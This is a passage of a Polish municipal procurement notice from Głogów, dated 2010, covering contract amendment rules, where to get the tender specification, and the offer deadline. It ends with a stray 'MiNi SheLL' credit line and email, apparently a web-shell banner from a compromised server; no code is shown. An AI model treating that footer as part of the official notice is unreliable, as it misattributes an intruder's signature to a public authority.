.	 rezygnacja  przez  zamawiającego z realizacji części   przedmiotu  umowy - w takim przypadku  wynagrodzenie  przysługuje  wykonawcy  zostanie  pomniejszone, przy  czym  Zamawiający  zapłaci za  wszystkie  spełnione  świadczenia  oraz udokumen-towane  koszty,  które  wykonawca  poniósł w związku z wynikającymi z umowy  planowaniami  świadczeniami,
.	 zmiany  uzasadnione  okolicznościami, o których  mowa w art. 357 Kc z uwzględnie-niem  faktu, że  za rażącą  zostanie uznana strata w wysokości, o  której mowa w art. 397 Ksh.
c)	Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać: 
.	opis zmiany,
.	uzasadnienie zmiany,
.	koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
.	czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.
d)	Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powsta-łych okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję
e)	Wykonanie zamówień uzupełniających i dodatkowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.glogow.sbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski
Rynek 10
67-200 Głogów
pok.314.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2010 godzina 10:00, miejsce: Urząd Miejski
Rynek 10
67-200 Głogów
pok.125.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com